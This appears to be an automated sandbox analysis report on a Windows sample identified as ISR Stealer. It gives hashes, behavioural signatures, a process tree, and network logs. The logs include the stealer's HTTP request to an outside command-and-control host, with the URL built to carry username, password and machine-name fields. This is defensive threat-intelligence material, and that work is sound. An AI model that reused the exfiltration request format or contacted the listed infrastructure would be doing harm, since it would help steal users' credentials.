Analysis

  • max time kernel
    45s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags
    arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/12/2022, 03:41 UTC

General

  • Target

    56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe

  • Size

    236KB

  • MD5

    df648c762a8b97f781a1adf22ce8eda7

  • SHA1

    e828b66f6593f13c2193368123acee983e8aee08

  • SHA256

    56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1

  • SHA512

    59392e21cd6bc65eb89bc96900c3f18e3733ccc48ea26a42926f401c4771a6c8246ca6b605300f223aaf9efb713c030f016e09267470d637a62b7a54c5916279

  • SSDEEP

    6144:m3bdXPx3QdIKCC0ef//uXltKc+LVsz9b8Gl:QQdFeCXuLKcCVsz6Gl

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in Visual Basic.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
    "C:\Users\Admin\AppData\Local\Temp\56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Users\Admin\AppData\Local\Temp\56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      /scomma "C:\Users\Admin\AppData\Local\Temp\RvAjrxUopk.ini"
      2⤵
        PID:1056

    Network

    • DNS
      coafuri123456.comoj.com
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      8.8.8.8:53
      Request
      coafuri123456.comoj.com
      IN A
      Response
      coafuri123456.comoj.com
      IN A
      153.92.0.100
    • GET
      http://coafuri123456.comoj.com/wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      153.92.0.100:80
      Request
      GET /wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename= HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: coafuri123456.comoj.com
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Sun, 11 Dec 2022 20:52:41 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
      Location: https://www.000webhost.com/migrate?static=true
      X-Frame-Options: sameorigin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • DNS
      www.000webhost.com
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      8.8.8.8:53
      Request
      www.000webhost.com
      IN A
      Response
      www.000webhost.com
      IN A
      104.19.184.120
      www.000webhost.com
      IN A
      104.19.185.120
    • GET
      https://www.000webhost.com/migrate?static=true
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      104.19.184.120:443
      Request
      GET /migrate?static=true HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.000webhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 403 Forbidden
      Date: Sun, 11 Dec 2022 20:52:42 GMT
      Content-Type: text/plain; charset=UTF-8
      Content-Length: 16
      Connection: keep-alive
      X-Frame-Options: SAMEORIGIN
      Referrer-Policy: same-origin
      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Server: cloudflare
      CF-RAY: 77811b03190bb76a-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    • 153.92.0.100:80
      http://coafuri123456.comoj.com/wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      http
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      420 B
      1.1kB
      5
      4

      HTTP Request

      GET http://coafuri123456.comoj.com/wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=

      HTTP Response

      301
    • 104.19.184.120:443
      https://www.000webhost.com/migrate?static=true
      tls, http
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      954 B
      6.5kB
      10
      9

      HTTP Request

      GET https://www.000webhost.com/migrate?static=true

      HTTP Response

      403
    • 8.8.8.8:53
      coafuri123456.comoj.com
      dns
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      69 B
      85 B
      1
      1

      DNS Request

      coafuri123456.comoj.com

      DNS Response

      153.92.0.100

    • 8.8.8.8:53
      www.000webhost.com
      dns
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      64 B
      96 B
      1
      1

      DNS Request

      www.000webhost.com

      DNS Response

      104.19.184.120
      104.19.185.120

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RvAjrxUopk.ini

      Filesize

      5B

      MD5

      d1ea279fb5559c020a1b4137dc4de237

      SHA1

      db6f8988af46b56216a6f0daf95ab8c9bdb57400

      SHA256

      fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

      SHA512

      720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

    • memory/1056-56-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1056-59-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

      Filesize

      8KB

    • memory/1056-60-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1056-61-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1056-62-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1056-63-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB
